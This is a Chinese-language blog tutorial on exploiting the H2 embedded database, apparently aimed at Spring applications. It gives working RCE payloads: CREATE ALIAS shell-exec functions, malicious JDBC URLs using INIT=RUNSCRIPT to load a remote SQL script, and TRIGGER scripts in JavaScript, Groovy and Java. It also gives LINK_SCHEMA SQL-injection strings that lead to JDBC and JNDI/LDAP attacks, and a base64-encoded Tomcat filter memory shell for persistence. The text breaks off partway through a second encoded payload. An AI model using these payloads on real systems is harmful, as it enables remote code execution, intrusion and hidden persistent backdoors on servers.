前言
在学 Spring 框架的利用时发现很多用的是用的 H2 数据库,就来学习一下相关的利用手法
前置学习
介绍
H2 是一个用 Java 开发的嵌入式数据库(如 Spring Boot 默认使用 H2),它本身只是一个类库,即只有一个 jar 文件,可以直接嵌入到应用项目中。H2 主要有如下三个用途:
1. 第一个用途,也是最常使用的用途就在于可以同应用程序打包在一起发布,这样可以非常方便地存储少量结构化数据。
2. 第二个用途是用于单元测试。启动速度快,而且可以关闭持久化功能,每一个用例执行完随即还原到初始状态。
3. 第三个用途是作为缓存,即当做内存数据库,作为NoSQL的一个补充。当某些场景下数据模型必须为关系型,可以拿它当Memcached使,作为后端MySQL/Oracle的一个缓冲层,缓存一些不经常变化但需要频繁访问的数据,比如字典表、权限表。
环境搭建
pom.xml 中加
<dependencies>
<!-- https://mvnrepository.com/artifact/com.h2database/h2 -->
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<version>2.0.204</version>
<scope>compile</scope>
</dependency>
</dependencies>也有 ui 界面的,下面直接用代码分析了
demo
写个连接的demo
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Properties;
public class demo {
public static void main(String[] args) {
String DRIVER_CLASS = "org.h2.Driver"; //H2 JDBC 驱动的类名
String JDBC_URL = "jdbc:h2:mem:test_any"; // 使用内存数据库
Properties info = new Properties();
info.setProperty("user", "sa");
info.setProperty("password", "");
try {
Class.forName(DRIVER_CLASS); // 加载驱动类
try (Connection conn = DriverManager.getConnection(JDBC_URL, info)) {
System.out.println("连接成功!");
}
} catch (ClassNotFoundException | SQLException e) {
e.printStackTrace();
}
}
}JDBC_URL:连接数据库,这里是 h2 数据库,所以格式是 jdbc:h2:<数据库位置>
• mem:testdb 表示使用内存数据库(程序结束后数据消失)。
• 若写为 jdbc:h2:./test,就变成文件数据库,保存在本地。
在 h2 中,默认用户 sa 的密码为空
创建表然后查询下
import java.sql.*;
import java.util.Properties;
public class create_demo {
public static void main(String[] args) {
String DRIVER_CLASS = "org.h2.Driver";
String JDBC_URL = "jdbc:h2:mem:test_any1";
Properties info = new Properties();
info.setProperty("user", "sa");
info.setProperty("password", "");
try {
Class.forName(DRIVER_CLASS);
try (Connection conn = DriverManager.getConnection(JDBC_URL, info);
Statement stmt = conn.createStatement()) {
System.out.println("连接H2数据库成功!");
// 创建test表
stmt.execute("CREATE TABLE test (" +
"id INT PRIMARY KEY, " +
"username VARCHAR(50), " +
"age INT)");
System.out.println("表test创建成功");
// 插入数据
stmt.executeUpdate("INSERT INTO test (id, username, age) VALUES " +
"(1, 'bob', 11), " +
"(2, 'john', 12)");
System.out.println("数据插入成功");
// 查询验证
System.out.println("\n当前表中的数据:");
ResultSet rs = stmt.executeQuery("SELECT * FROM test");
while (rs.next()) {
System.out.printf("id=%d, username=%s, age=%d%n",
rs.getInt("id"),
rs.getString("username"),
rs.getInt("age"));
}
}
} catch (ClassNotFoundException | SQLException e) {
System.err.println("发生错误:");
e.printStackTrace();
}
}
}conn.createStatement() 创建一个 Statement 对象,用于执行 SQL 语句,其他就是些基础的 sql 语句,不多说,每个操作用到的函数不同,比如插入数据时用 executeUpdate ,实现查询语句时用 executeQuery
漏洞分析
RCE
Alias Script RCE
如果可以执行任意 sql 语句,可以写个自定义函数,这个函数跟 exec 有同样的作用的话就能 rce,和 mysql 数据库中的 udf 一个道理
//创建别名
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;
//调用SHELLEXEC执行命令
CALL SHELLEXEC('id');
CALL SHELLEXEC('whoami');
创建自定义函数时用的是 execute
INIT RunScript RCE
在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE,并且有很多利用,首先就是INIT,进行H2连接的时候可以执行一段SQL脚本,我们可以构造恶意的脚本去RCE
poc.sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "test";}';CALL EXEC ('calc')payload
jdbc:h2:mem:testdb;INIT=RUNSCRIPT FROM 'http://127.0.0.1:9090/poc.sql'
TRIGGER Script RCE
payload
//groovy
Class.forName("org.h2.Driver");
String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x";
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";
//js
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"java.lang.Runtime.getRuntime().exec('calc.exe')\n" +
"$$\n";除了 Alias 别名还可以用 TRIGGER 去手搓 groovy 或者 js 代码去 rce,但是 groovy 依赖一般都是不会有的,所以 js 是更加通用的选择,这里将 poc.sql 简化成了一句话而且还不用远程环境交互(不需要指定 MODE 也能成功,大多数 H2 版本默认都支持这类执行行为)
Litch1 翻了 CREATE ALIAS 实现的源代码,发现在 SQL 语句中对于 JAVA 方法的定义被交给了源代码编译器。有三种支持的编译器:Java/Javascript/Groovy,但这貌似还有 ruby(但试了下 ruby,不行,应该要写特殊的依赖或配置)
根据传入的开头来看是哪种编译器,groovy 编译器是调用 GroovyCompiler.parseClass() 来解析 groovy 代码
js 编译器则是调用 org.h2.schema.TriggerObject#loadFromSource,不仅仅编译源代码,还调用了 eval 执行
高版本JDK下的RCE
在上面说到的 TRIGGER Script RCE 中,是依靠 js 来 rce 的,Nashorn 是默认内置的 JavaScript 引擎,但在 JDK 15+ 中,Nashorn 已被移除(除非手动引入)
payload
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$ void poc() throws Exception{ Runtime.getRuntime().exec(\"calc\")\\;}$$";
还是看到 org.h2.util.SourceCompiler#getClass
public Class<?> getClass(String var1) throws ClassNotFoundException {
Class var2 = (Class)this.compiled.get(var1);
if (var2 != null) {
return var2;
} else {
String var3 = (String)this.sources.get(var1);
if (isGroovySource(var3)) {
Class var5 = SourceCompiler.GroovyCompiler.parseClass(var3, var1);
this.compiled.put(var1, var5);
return var5;
} else {
ClassLoader var4 = new ClassLoader(this.getClass().getClassLoader()) {
public Class<?> findClass(String var1) throws ClassNotFoundException {
Class var2 = (Class)SourceCompiler.this.compiled.get(var1);
if (var2 == null) {
String var3 = (String)SourceCompiler.this.sources.get(var1);
String var4 = null;
int var5 = var1.lastIndexOf(46);
String var6;
if (var5 >= 0) {
var4 = var1.substring(0, var5);
var6 = var1.substring(var5 + 1);
} else {
var6 = var1;
}
String var7 = SourceCompiler.getCompleteSourceCode(var4, var6, var3);
if (SourceCompiler.JAVA_COMPILER != null && SourceCompiler.this.useJavaSystemCompiler) {
var2 = SourceCompiler.this.javaxToolsJavac(var4, var6, var7);
} else {
byte[] var8 = SourceCompiler.this.javacCompile(var4, var6, var7);
if (var8 == null) {
var2 = this.findSystemClass(var1);
} else {
var2 = this.defineClass(var1, var8, 0, var8.length);
}
}
SourceCompiler.this.compiled.put(var1, var2);
}
return var2;
}
};
return var4.loadClass(var1);
}
}
}这里传入的值如果既不是 groovy 也是不 javascript ,H2 默认会将其当作 Java 源码处理,用 Javac 编译它,最后用 loadClass 加载这个类
调用栈
loadFromSource:113, TriggerObject (org.h2.schema)
load:87, TriggerObject (org.h2.schema)
setTriggerAction:149, TriggerObject (org.h2.schema)
setTriggerSource:142, TriggerObject (org.h2.schema)
update:125, CreateTrigger (org.h2.command.ddl)
update:173, CommandContainer (org.h2.command)
executeUpdate:252, Command (org.h2.command)
openSession:279, Engine (org.h2.engine)
createSession:201, Engine (org.h2.engine)
connectEmbeddedOrServer:338, SessionRemote (org.h2.engine)
<init>:117, JdbcConnection (org.h2.jdbc)
connect:59, Driver (org.h2)
getConnection:681, DriverManager (java.sql)
getConnection:190, DriverManager (java.sql)
main:25, rce_test很简单,就是加载我们自己写的 java 代码,不需要任何引擎,INIT RunScript RCE 和 Alias Script RCE 也是一样的
文件读取
官方文档:https://www.h2database.com/html/functions.html#file_read
按照格式来就好了
写文件
还是看官方文档
第一个参数是写入值,第二个参数是写入文件地址
JDBC
用到的是 link_schema 函数
第二个参数是数据库驱动的名称,第三个参数是 jdbc 的连接地址,在连接的时候执行 sql 语句,这里用 INIT RunScript RCE 来打
String username = "bob' union select 1,2,3 from link_schema('any_test', '', 'jdbc:h2:mem:testdb1;INIT=RUNSCRIPT FROM ''http://127.0.0.1:9090/poc.sql''', 'sa', 'sa', 'PUBLIC')--";
JNDI
这里还是用的 link_schema 函数,根据到其实现类 org.h2.expression.function.table.LinkSchemaFunction 的 getValue 函数
JdbcUtils.getConnection 的 var3、var4 就是我们传入的数据库驱动的名称和 url 地址,跟进其实现
如果 url 是 jdbc:h2: 开头,就 jdbc 连接,如果不是就用 loadUserClass 加载,loadUserClass 中写明了所有类都允许加载,然后回到 JdbcUtils.getConnection 中,如果是加载的类 javax.naming.Context 类或其子类、实现类,就直接 lookup,
可以直接加载 javax.naming.InitialContext,打jndi , payload
String username = "bob' union select 1,2,3 from link_schema('any_test', 'javax.naming.InitialContext', 'ldap://127.0.0.1:1389/v6uu9g', 'sa', 'sa', 'PUBLIC')--";
这个对于 h2 依赖版本有限制,2.1.x全版本都有限制,2.0.x < 2.0.206 无限制
内存马
不出网的情况下方便 rce,写入本地文件中然后发起 jdbc 连接
poc.sql
CREATE ALIAS EXEC AS '
void e(String cmd) throws Exception{
String evilClassBase64 = "yv66vgAAADQBTQoAIQC5CgC6ALsKALwAvQoAvAC+CgC6AL8KACEAwAoAwQC7BwDCCgAhAMMKAEgAxAoAIwDFCgDBAMYKAEkAxwoAyADJCgDIAMoHAMsIAH8KAEgAzAcAzQoAEwDOBwDPCADQBwDRCgAXAMcKABcA0ggA0woAFwDUBwDVCgAcAMcKABwA0goAHADWBwDXBwDYBwDZBwDaCgBIANsIAIoHANwKACYA3QoAFQDeCgAVAN8IAOALAOEA4gsA4wDkCADlCADmCgDnAOgKADQA6QgA6goANADrBwDsBwDtCADuCADvCgAzAPAIAPEIAPIHAPMKADMA9AoA9QD2CgA6APcIAPgKADoA+QoAOgD6CgA6APsKADoA/AoA/QD+CgD9AP8KAP0A/AsBAAEBBwECBwEDBwEEBwEFAQAVY3JlYXRlV2l0aENvbnN0cnVjdG9yAQBbKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9DbGFzcztbTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBABJjbGFzc1RvSW5zdGFudGlhdGUBABFMamF2YS9sYW5nL0NsYXNzOwEAEGNvbnN0cnVjdG9yQ2xhc3MBAAxjb25zQXJnVHlwZXMBABJbTGphdmEvbGFuZy9DbGFzczsBAAhjb25zQXJncwEAE1tMamF2YS9sYW5nL09iamVjdDsBAAdvYmpDb25zAQAfTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAAnNjAQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAFkxqYXZhL2xhbmcvQ2xhc3M8VFQ7PjsBABdMamF2YS9sYW5nL0NsYXNzPC1UVDs+OwEAFVtMamF2YS9sYW5nL0NsYXNzPCo+OwEAJUxqYXZhL2xhbmcvcmVmbGVjdC9Db25zdHJ1Y3RvcjwtVFQ7PjsBACJMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I8Kj47AQAKRXhjZXB0aW9ucwEACVNpZ25hdHVyZQEAcDxUOkxqYXZhL2xhbmcvT2JqZWN0Oz4oTGphdmEvbGFuZy9DbGFzczxUVDs+O0xqYXZhL2xhbmcvQ2xhc3M8LVRUOz47W0xqYXZhL2xhbmcvQ2xhc3M8Kj47W0xqYXZhL2xhbmcvT2JqZWN0OylUVDsBAAhnZXRGaWVsZAEAPihMamF2YS9sYW5nL0NsYXNzO0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQACZXgBACBMamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uOwEABWNsYXp6AQAJZmllbGROYW1lAQASTGphdmEvbGFuZy9TdHJpbmc7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAUTGphdmEvbGFuZy9DbGFzczwqPjsBAA1TdGFja01hcFRhYmxlBwDYBwDtBwEGBwDCAQBBKExqYXZhL2xhbmcvQ2xhc3M8Kj47TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1nZXRGaWVsZFZhbHVlAQA4KExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAANvYmoBABJMamF2YS9sYW5nL09iamVjdDsBAAlmaWVsZG5hbWUBAAFvAQAGPGluaXQ+AQADKClWAQAEdGhpcwEADUxGaWx0ZXJTaGVsbDsBABV3ZWJhcHBDbGFzc0xvYWRlckJhc2UBADJMb3JnL2FwYWNoZS9jYXRhbGluYS9sb2FkZXIvV2ViYXBwQ2xhc3NMb2FkZXJCYXNlOwEACXJlc291cmNlcwEAL0xvcmcvYXBhY2hlL2NhdGFsaW5hL3dlYnJlc291cmNlcy9TdGFuZGFyZFJvb3Q7AQAHY29udGV4dAEAKkxvcmcvYXBhY2hlL2NhdGFsaW5hL2NvcmUvU3RhbmRhcmRDb250ZXh0OwEACmZpbHRlck5hbWUBAAlmaWx0ZXJNYXABADFMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7AQAJZmlsdGVyRGVmAQAxTG9yZy9hcGFjaGUvdG9tY2F0L3V0aWwvZGVzY3JpcHRvci93ZWIvRmlsdGVyRGVmOwEAF2FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAyTG9yZy9hcGFjaGUvY2F0YWxpbmEvY29yZS9BcHBsaWNhdGlvbkZpbHRlckNvbmZpZzsBAA1maWx0ZXJDb25maWdzAQATTGphdmEvdXRpbC9IYXNoTWFwOwEAWUxqYXZhL3V0aWwvSGFzaE1hcDxMamF2YS9sYW5nL1N0cmluZztMb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnOz47AQAIZG9GaWx0ZXIBAFsoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlO0xqYXZheC9zZXJ2bGV0L0ZpbHRlckNoYWluOylWAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABYwEAE0xqYXZhL3V0aWwvU2Nhbm5lcjsBAARhcmcwAQAHcmVxdWVzdAEAHkxqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAfTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEABWNoYWluAQAbTGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47BwEHBwDsBwDzBwEDBwEIBwEJBwEKBwECBwELBwEMAQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcBDQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAEaW5pdAEAHyhMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7KVYBAAxmaWx0ZXJDb25maWcBABxMamF2YXgvc2VydmxldC9GaWx0ZXJDb25maWc7AQAHZGVzdHJveQEAClNvdXJjZUZpbGUBABBGaWx0ZXJTaGVsbC5qYXZhDAEOAQ8HARAMAREBEgcBEwwBFAEVDAEWARcMARgBGQwBGgEbBwEGAQAeamF2YS9sYW5nL05vU3VjaEZpZWxkRXhjZXB0aW9uDAEcAR0MAGMAZAwBHgEdDAEfASAMAHkAegcBIQwBIgEjDAEkASUBADBvcmcvYXBhY2hlL2NhdGFsaW5hL2xvYWRlci9XZWJhcHBDbGFzc0xvYWRlckJhc2UMAHMAdAEALW9yZy9hcGFjaGUvY2F0YWxpbmEvd2VicmVzb3VyY2VzL1N0YW5kYXJkUm9vdAwBJgEnAQAob3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL1N0YW5kYXJkQ29udGV4dAEABWZmZmZmAQAvb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXAMASgBKQEAAi8qDAEqASkBAC9vcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZgwBKwEsAQAwb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ29uZmlnAQAPamF2YS9sYW5nL0NsYXNzAQAbb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0AQAQamF2YS9sYW5nL09iamVjdAwASwBMAQARamF2YS91dGlsL0hhc2hNYXAMAS0BLgwBLwEwDAExATIBAANjbWQHAQgMATMBNAcBCQwBNQE2AQAAAQAHb3MubmFtZQcBNwwBOAE0DAE5AToBAAN3aW4MATsBPAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMAHkBPQEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDAE+AT8HAUAMAUEBQgwAeQFDAQACXEEMAUQBRQwBRgFHDAFIAToMAUkAegcBBwwBSgEpDAFLAHoHAQoMAI0BTAEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAtGaWx0ZXJTaGVsbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBABRqYXZheC9zZXJ2bGV0L0ZpbHRlcgEAF2phdmEvbGFuZy9yZWZsZWN0L0ZpZWxkAQATamF2YS9pby9QcmludFdyaXRlcgEAHGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3QBAB1qYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZQEAGWphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW4BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAWZ2V0RGVjbGFyZWRDb25zdHJ1Y3RvcgEAMyhbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOwEAHWphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yAQANc2V0QWNjZXNzaWJsZQEABChaKVYBAB1zdW4vcmVmbGVjdC9SZWZsZWN0aW9uRmFjdG9yeQEAFGdldFJlZmxlY3Rpb25GYWN0b3J5AQAhKClMc3VuL3JlZmxlY3QvUmVmbGVjdGlvbkZhY3Rvcnk7AQAebmV3Q29uc3RydWN0b3JGb3JTZXJpYWxpemF0aW9uAQBRKExqYXZhL2xhbmcvQ2xhc3M7TGphdmEvbGFuZy9yZWZsZWN0L0NvbnN0cnVjdG9yOylMamF2YS9sYW5nL3JlZmxlY3QvQ29uc3RydWN0b3I7AQALbmV3SW5zdGFuY2UBACcoW0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQANZ2V0U3VwZXJjbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsBAAhnZXRDbGFzcwEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADXNldEZpbHRlck5hbWUBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA1hZGRVUkxQYXR0ZXJuAQAJc2V0RmlsdGVyAQAZKExqYXZheC9zZXJ2bGV0L0ZpbHRlcjspVgEAA3B1dAEAOChMamF2YS9sYW5nL09iamVjdDtMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAMYWRkRmlsdGVyRGVmAQA0KExvcmcvYXBhY2hlL3RvbWNhdC91dGlsL2Rlc2NyaXB0b3Ivd2ViL0ZpbHRlckRlZjspVgEADGFkZEZpbHRlck1hcAEANChMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJNYXA7KVYBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEA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";
byte[] bytes = java.util.Base64.getDecoder().decode(evilClassBase64);
java.lang.reflect.Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
method.setAccessible(true);
((Class)method.invoke(ClassLoader.getSystemClassLoader(), "FilterShell", bytes, 0, bytes.length)).newInstance();
}
';
CALL EXEC('calc');或者打 TRIGGER Script RCE
String JDBC_URL = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\n" +
"INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
"org.springframework.cglib.core.ReflectUtils.defineClass(\"InjectToController\",org.sp
ringframework.util.Base64Utils.decodeFromString(\"yv66vgAAADQA5QoAPQB2CgB3AHgHAHkKAAMAe
goAAwB7CAB8CwB9AH4LAH8AgAgAgQgAggoAgwCECgAQAIUIAIYKABAAhwcAiAcAiQgAiggAiwoADwCMCACNCACO
BwCPCgAPAJAKAJEAkgoAFgCTCACUCgAWAJUKABYAlgoAFgCXCgAWAJgKAJkAmgoAmQCbCgCZAJgIAJwLAJ0Angc
